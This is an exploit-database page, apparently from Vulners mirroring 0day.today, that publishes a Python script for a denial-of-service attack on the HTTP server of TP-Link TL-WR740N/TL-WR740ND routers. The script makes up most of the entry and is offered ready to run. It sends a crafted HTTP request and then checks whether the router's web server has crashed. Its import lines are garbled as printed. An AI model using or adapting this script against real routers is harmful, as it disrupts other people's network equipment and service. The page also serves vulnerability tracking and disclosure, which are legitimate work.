Lucene search
K

TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite N Router HTTP DoS

🗓️ 01 Dec 2013 00:00:00Reported by Dino CausevicType 
zdt
 zdt
🔗 0day.today👁 45 Views

150M Wireless Lite N Router HTTP Denial of Service (DoS) via HTTP Reques

Code
# Exploit title: 150M Wireless Lite N Router HTTP DoS
# Date: 28.11.2013
# Exploit Author: Dino Causevic
# Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N
# Vendor Homepage: http://www.tp-link.com/
# Contact: dincaus (packetstormsecurity.com)
# CVE:
# Firmware Version: 3.12.11 Build 120320 Rel.51047n
# ===================================================================================================
#   Just execute Python script below
# ===================================================================================================
 
# Usage: python TP_Link_DoS.py <IP> <Port>
 
# 150M Wireless Lite N Router, Model No. TL-WR740N / TL-WR740ND sending HTTP request with the headers inserted
# below in the script will crash HTTP Server.
 
#!/usr/bin/python
import socket
import import
sys urllib2
 
host = ""
port = 0
if(len(sys.argv) >= 2):
    host = sys.argv[1]
    port = sys.argv[2]
else:
    print "Invalid number of the arguments."
    print "Usage <server> <port>"
    exit(1)
     
     
print "Connecting on ",host,":",port
 
s = socket.socket();
stringOfDeath = "GET / HTTP/1.1\r\n";
stringOfDeath = stringOfDeath + "Accept-Encoding: identity\r\n";
stringOfDeath = stringOfDeath + "Host: "+ host + "\r\n";
stringOfDeath = stringOfDeath + "Connection: close\r\n";
stringOfDeath = stringOfDeath + "User-Agent: PythonLib/2.7\r\n";
 
s.connect((host,int(port)))
 
print "Sending packet..."
s.send(stringOfDeath)
print "Packet sent."
print "Check if router http server down..."
 
try:
    response = urllib2.urlopen("http://"+host+":"+port,None,5)
    response.read()
except socket.timeout:
    print "Timeout occured, http server probaly down."
    exit(1)

#  0day.today [2018-02-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Dec 2013 00:00Current
7.1High risk
Vulners AI Score7.1
45